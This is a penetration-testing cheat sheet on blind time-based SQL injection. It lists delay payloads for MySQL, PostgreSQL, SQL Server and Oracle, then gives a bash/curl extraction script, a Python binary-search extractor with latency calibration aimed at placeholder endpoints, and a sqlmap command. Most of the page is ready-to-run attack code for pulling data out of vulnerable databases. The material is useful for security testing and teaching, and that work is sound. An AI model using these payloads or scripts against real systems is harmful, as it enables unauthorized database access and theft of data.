
Blind Time-Based SQL Injection

CWE: CWE-89
Tools: sqlmap, ghauri
Difficulty: 🔴 advanced

Blind Extraction -- Time-Based

Time-based blind injection is used when the application's response (status code, body, length, error text) is identical whether an injected condition is true or false, so boolean-based inference has nothing to compare. Instead you make the database delay its response only when a chosen condition holds and infer the answer from the round-trip time. Each request yields about one bit, so extraction is slow and sensitive to jitter: measure the baseline latency with un-injected requests, pick a delay well above it, repeat ambiguous readings, and extract characters by binary search on their ASCII value rather than by guessing them one at a time. Inject after a value that matches a row (e.g. id=1' AND ...): with AND, the injected expression is only evaluated for rows the preceding condition matches, so a non-matching value may never trigger the delay at all.

MySQL

-- Basic delay. MySQL only treats "--" as a comment when it is followed by
-- whitespace; "-- -" survives trailing-space stripping by the application ("#" also works).
' AND SLEEP(5)-- -

-- Conditional delay (if condition is true, sleep)
' AND IF(1=1,SLEEP(5),0)-- -

-- Extract data with timing
' AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>64,SLEEP(5),0)-- -

-- BENCHMARK alternative for when SLEEP() is filtered. The duration depends on
-- server CPU and load, so calibrate the iteration count instead of assuming seconds.
' AND BENCHMARK(10000000,SHA1('test'))-- -

-- With AND, SLEEP() runs once per row the preceding condition matches; with OR it
-- runs for every row of the table, so the delay scales with table size.

PostgreSQL

-- Basic delay (stacked query; needs a driver/API that executes multiple statements)
'; SELECT pg_sleep(5);--

-- Conditional delay without stacking. pg_sleep() returns void, so it cannot sit
-- directly in a boolean expression ("argument of AND must be type boolean, not
-- type void"); select through it instead, the way sqlmap does.
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN 1=1 THEN 5 ELSE 0 END))--

-- Heavy computation alternative (no pg_sleep needed; timing scales with server CPU)
' AND (SELECT COUNT(*) FROM generate_series(1,5000000))>0--

Microsoft SQL Server

-- Basic delay. WAITFOR is a statement, not an expression, so it cannot be placed
-- inside a WHERE clause: every WAITFOR payload needs the statement separator ';'
-- (stacked queries, which most SQL Server drivers allow).
'; WAITFOR DELAY '0:0:5';--

-- Conditional delay
'; IF (1=1) WAITFOR DELAY '0:0:5'--

-- Data extraction
'; IF (ASCII(SUBSTRING(DB_NAME(),1,1))>64) WAITFOR DELAY '0:0:5'--

Oracle

-- DBMS_PIPE method. RECEIVE_MESSAGE() waits up to 5 s for a message on pipe 'a'
-- and returns 1 on timeout, so 1=(...) is true exactly when the delay happened.
-- Requires EXECUTE on DBMS_PIPE for the application's schema (common, not guaranteed).
' AND 1=(SELECT CASE WHEN 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 0 END FROM dual)--

-- Heavy query alternative (no extra privileges). As written it delays on every
-- request; put the COUNT(*) subquery inside a CASE to make the delay conditional.
' AND 1=(SELECT COUNT(*) FROM all_objects a, all_objects b, all_objects c)--

Time-Based Extraction Automation

#!/bin/bash
# Linear time-based extraction of DATABASE() on MySQL: up to 95 requests per
# character, each of which waits out the SLEEP(5) when it hits. Fine as a demo;
# use binary search (7 requests per character) for real extraction.
threshold=4 # seconds: above normal latency, below latency + the 5 s sleep
for pos in $(seq 1 20); do
  found=0
  for char in $(seq 32 126); do
    # -G --data-urlencode sends the payload as a properly encoded query string;
    # a raw URL containing spaces and quotes is rejected or mangled by curl.
    # %{time_total} gives sub-second timing (date +%s only resolves whole seconds).
    duration=$(curl -s -o /dev/null -w '%{time_total}' -G \
      --data-urlencode "id=1' AND IF(ASCII(SUBSTRING(DATABASE(),$pos,1))=$char,SLEEP(5),0)-- -" \
      "https://target.com/api")
    if awk -v d="$duration" -v t="$threshold" 'BEGIN { exit !(d > t) }'; then
      echo "Position $pos: $(printf "\\x$(printf '%02x' "$char")")"
      found=1
      break
    fi
  done
  # No printable character matched: SUBSTRING() returned '' and the name has ended.
  [ "$found" -eq 1 ] || break
done
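The script above guesses each character by equality, so a 20-character name can cost nearly 2,000 requests, and it compares against a fixed 4-second threshold that is wrong the moment the target is slower or faster than expected. The following Python script is an added example, not code from the original page or from sqlmap/ghauri: it extracts the same MySQL DATABASE() value by binary search on the ASCII value (seven "is it greater than n?" requests per character), measures the baseline latency before deciding what counts as "delayed", and re-checks any slow reading before trusting it. The endpoint https://target.example/api, the parameter name id, the assumption that id=1 matches a row, and all function names are assumptions made for the example.

```python
"""Time-based blind extraction with binary search and a calibrated threshold.

Added example, not code from the original page. It assumes a MySQL back end
behind a hypothetical endpoint https://target.example/api?id=<value>, where
`id` lands inside a single-quoted string in the query and id=1 matches a row.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

SLEEP_SECONDS = 3          # delay requested from the database on a TRUE condition
CALIBRATION_REQUESTS = 5   # un-injected requests used to measure baseline latency


def mysql_payload(expr: str, pos: int, threshold: int, sleep: int = SLEEP_SECONDS) -> str:
    """Value for the `id` parameter: sleep iff character `pos` (1-based) of the
    result of `expr` has an ASCII code greater than `threshold`.
    `-- -` is used because MySQL only honours `--` when followed by whitespace."""
    return (f"1' AND IF(ASCII(SUBSTRING(({expr}),{pos},1))>{threshold},"
            f"SLEEP({sleep}),0)-- -")


def timed_get(url: str, timeout: float = 30.0) -> float:
    """Seconds until the response (or error) arrives; the body is irrelevant."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except (urllib.error.URLError, OSError):
        pass  # a 4xx/5xx or a timeout still tells us how long the server took
    return time.monotonic() - start


def make_http_oracle(base_url: str, expr: str):
    """Build oracle(pos, threshold) -> bool backed by timed HTTP requests.

    The decision cutoff is measured, not guessed: the median latency of a few
    un-injected requests plus half of the requested sleep."""
    plain = f"{base_url}?{urllib.parse.urlencode({'id': '1'})}"
    baseline = statistics.median(timed_get(plain) for _ in range(CALIBRATION_REQUESTS))
    cutoff = baseline + SLEEP_SECONDS / 2

    def oracle(pos: int, threshold: int) -> bool:
        query = urllib.parse.urlencode({"id": mysql_payload(expr, pos, threshold)})
        url = f"{base_url}?{query}"
        if timed_get(url) < cutoff:
            return False
        # A slow but undelayed response (jitter, GC pause) would send the binary
        # search down the wrong branch, so a TRUE reading is only accepted when it repeats.
        return timed_get(url) >= cutoff

    return oracle


def extract_char(oracle, pos: int, lo: int = 0, hi: int = 127) -> int:
    """Binary search for the ASCII code c of character `pos`, asking only
    "is c > n?": 7 queries for the range 0..127 instead of up to 95 equality
    guesses. oracle(pos, n) must return True iff c > n."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):
            lo = mid + 1      # c is somewhere in mid+1..hi
        else:
            hi = mid          # c is somewhere in lo..mid
    return lo


def extract_string(oracle, max_len: int = 64) -> str:
    """Read characters until SUBSTRING() runs off the end: MySQL's ASCII('') is 0."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    oracle = make_http_oracle("https://target.example/api", "DATABASE()")
    print("current database:", extract_string(oracle))
```

The search and the HTTP timing are separated on purpose: extract_char only needs a function that answers "greater than n?", so the same code extracts any expression (USER(), a column of a subquery) by changing expr, and it can be exercised offline against a fake oracle before it is pointed at a target. Lower the sleep only as far as the measured baseline allows; on a jittery link, 2 s is often too little and the confirmation request is what keeps a single slow response from corrupting every later character. sqlmap and ghauri automate the same approach (for example `sqlmap -u 'https://target.com/api?id=1' --technique=T --time-sec=5 --current-db`).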